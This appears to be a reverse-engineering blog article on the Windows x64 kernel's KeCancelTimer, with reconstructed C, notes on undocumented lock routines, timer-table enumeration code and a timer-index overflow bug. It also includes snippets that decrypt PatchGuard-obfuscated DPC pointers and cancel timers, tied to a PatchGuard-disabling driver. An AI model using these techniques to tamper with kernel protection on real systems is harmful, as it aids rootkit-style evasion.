// push rbx // sub rsp,20h KIRQL OldIrql = 0; BOOLEAN Existed = FALSE; PKSPIN_LOCK_QUEUE LockArray = NULL; ULONG LockIndex = 0; KTIMER_TABLE_ENTRY* TimerEntry = NULL; // mov r9,rcx // call nt!KiAcquireDispatcherLockRaiseToSynch OldIrql = KiAcquireDispatcherLockRaiseToSynch(); // mov bl,byte ptr [r9+3] // test bl,bl // mov r10b,al Existed = InTimer->Header.Inserted; // je nt!KeCancelTimer+0x76 if(Existed) { // nt!KeCancelTimer+0x19: // mov rcx,qword ptr gs:[28h] LockArray = KeGetPcr()->LockArray; // movzx r8d, byte ptr [r9+2] // mov eax,r8d // shr eax,4 // and eax,0Fh // add eax,11h LockIndex = ((InTimer->Header.Hand / sizeof(KSPIN_LOCK_QUEUE)) & 0x0F) + LockQueueTimerTableLock; // shl rax,4 // add rcx,rax // call nt!KeAcquireQueuedSpinLockAtDpcLevel KeAcquireQueuedSpinLockAtDpcLevel(&LockArray[LockIndex]); // mov byte ptr [r9+3],0 InTimer->Header.Inserted = FALSE; // mov rax,qword ptr [r9+28h] // mov rdx,qword ptr [r9+20h] // cmp rdx,rax // mov qword ptr [rax],rdx // mov qword ptr [rdx+8],rax //jne nt!KeCancelTimer+0x71 if(RemoveEntryList(&InTimer->TimerListEntry)) { //nt!KeCancelTimer+0x58: // lea rdx,[r8+r8*2] // lea rax,[nt!KiTimerTableListHead] // lea r8,[rax+rdx*8] TimerEntry = &KiTimerTableListHead[InTimer->Header.Hand]; // cmp r8,qword ptr [r8] //jne nt!KeCancelTimer+0x71 if(TimerEntry == (KTIMER_TABLE_ENTRY*)TimerEntry->Entry.Flink) { //nt!KeCancelTimer+0x6c: // or dword ptr [r8+14h],0FFFFFFFFh TimerEntry->Time.HighPart = 0xFFFFFFFF; } } //nt!KeCancelTimer+0x71: //call nt!KeReleaseQueuedSpinLockFromDpcLevel KeReleaseQueuedSpinLockFromDpcLevel(&LockArray[LockIndex]); } //nt!KeCancelTimer+0x76: //call nt!KiReleaseDispatcherLockFromSynchLevel KiReleaseDispatcherLockFromSynchLevel(); // mov cl,r10b // call nt!KiExitDispatcher KiExitDispatcher(OldIrql); // mov al,bl return Existed; // add rsp,20h // pop rbx // ret
I already inserted the source code guessed from the disassembly. I don’t want to explain how you get it, because this is mainly based on experience with compiler building and (dis-)assemblers.
As you can see, the C-Code for it is quite straightforward. Though, there is a bug in the timer management, but I will come back to that later. The following is a little documentation about totally undocumented and unexported kernel symbols.
KIRQL KiAcquireDispatcherLockRaiseToSynch()
Probably locks the timer and/or DPC database. Raises the IRQL to
DISPATCH_LEVEL
and returns the previous state.
void KeAcquireQueuedSpinLockAtDpcLevel(PKSPIN_LOCK_QUEUE)
Is similar to the publicly availableKeAcquireInStackQueuedSpinLock
. You may use this method to acquire any of the locks inKPCR::LockArray
. Please note that this method shall be called atDISPATCH_LEVEL
only. The following constants may be helpful to index the right one:
Hide Copy Code
LockQueueDispatcherLock 0 LockQueueExpansionLock 1 LockQueuePfnLock 2 LockQueueSystemSpaceLock 3 LockQueueVacbLock 4 LockQueueMasterLock 5 LockQueueNonPagedPoolLock 6 LockQueueIoCancelLock 7 LockQueueWorkQueueLock 8 LockQueueIoVpbLock 9 LockQueueIoDatabaseLock 10 LockQueueIoCompletionLock 11 LockQueueNtfsStructLock 12 LockQueueAfdWorkQueueLock 13 LockQueueBcbLock 14 LockQueueMmNonPagedPoolLock 15 LockQueueTimerTableLock 17
void KeReleaseQueuedSpinLockFromDpcLevel (PKSPIN_LOCK_QUEUE)
Is similar to the publicly availableKeReleaseInStackQueuedSpinLock
. You have to call it to release any of the previously acquired locks inKPCR::LockArray
. Please note that this method shall be called atDISPATCH_LEVEL
only.
void KiReleaseDispatcherLockFromSynchLevel()
Probably releases the timer/DPC lock at
DISPATCH_LEVEL
and does NOT change the IRQL.
void KiExitDispatcher(KIRQL InOldIrql)
Shall be called atDISPATCH_LEVEL
and will lower the IRQL toInOldIrql
. I think this method was not combined with the previous method, to allow performing more operations atDISPATCH_LEVEL
(without holding the lock) before actually lowering the IRQL. I recently read in some Microsoft paper, that it also may schedule a new thread, now after the DPC level operation is done…
With this information in mind, we are ready to build our own enumeration method:
Hide Shrink Copy Code
// a little helper… PKSPIN_LOCK_QUEUE KeTimerIndexToLockQueue(UCHAR InTimerIndex) { return &(KeGetPcr()->LockArray[((InTimerIndex / sizeof(KSPIN_LOCK_QUEUE)) & 0x0F) + LockQueueTimerTableLock]); } // this is where the enumeration starts OldIrql = KiAcquireDispatcherLockRaiseToSynch(); for(Index = 0; Index < TIMER_TABLE_SIZE; Index++) { LockQueue = KeTimerIndexToLockQueue((UCHAR)(Index & 0xFF)); KeAcquireQueuedSpinLockAtDpcLevel(LockQueue); // now we can work with the timer list... TimerListHead = &KiTimerTableListHead[Index]; TimerList = TimerListHead->Entry.Flink; while(TimerList != (PLIST_ENTRY)TimerListHead) { Timer = CONTAINING_RECORD(TimerList, KTIMER, TimerListEntry); TimerList = TimerList->Flink; // TODO: work with the timer… } KeReleaseQueuedSpinLockFromDpcLevel(LockQueue); } KiReleaseDispatcherLockFromSynchLevel(); KiExitDispatcher(OldIrql);
If you now want to cancel a timer during enumeration, you could use the following code snippet:
Hide Copy Code
// TODO: work with the timer… Timer->Header.Inserted = FALSE; if(RemoveEntryList(&Timer->TimerListEntry)) TimerListHead->Time.HighPart = 0xFFFFFFFF;
Since PatchGuard 2, the timer DPCs are encrypted, so don’t try to dereference the pointer. The PG2Disable-Driver shows you how to obtain the two internal decryption keys KiWaitNever
and KiWaitAlways
. With those symbols you may decrypt the KDPC pointer with the following code:
Hide Copy Code
ULONGLONG RDX = (ULONGLONG)Timer->Dpc; RDX ^= InKiWaitNever; RDX = _rotl64(RDX, *KiWaitNever & 0xFF); RDX ^= (ULONGLONG)Timer; RDX = _byteswap_uint64(RDX); RDX ^= *KiWaitAlways; return (KDPC*)RDX;
Now you are able to enumerate all Windows timers in a stable and interlocked way, just like the OS does it. Please note that you can’t call KeCancelTimer
during the enumeration as this would cause a deadlock! The PG2Disable-Driver may write all the timer information to a log file, even if we are running at DPC level during enumeration.
Now we can compare our both code parts. In the code of KeCancelTimer
we had:
Hide Copy Code
TimerEntry = &KiTimerTableListHead[InTimer->Header.Hand];
And in our enumeration:
Hide Copy Code
TimerListHead = &KiTimerTableListHead[Index];
Well, they look equal on the surface. But the difference here is that Index
in our enumeration actually has a range from zero to 511
. This is because the public WDK constant TIMER_TABLE_SIZE
has a value of 512
. Now you might see the problem: InTimer->Header.Hand
is only one byte wide according to the publicly available DISPATCH_HEADER
structure. This causes Hand to overflow if the timer is placed in a linked list with an index greater than 255
. This also explains the strange switch we extracted from KeCancelTimer
, which again checks whether the linked list is empty, even if the use of RemoveEntryList
already proved it. Redmon probably realized that there is something wrong and applied this workaround to make sure that only the timestamp of empty timer lists is reset. But actually this seems to cause no big trouble at all. Just a funny thing that we discovered the reason of such a bug with plain reverse engineering.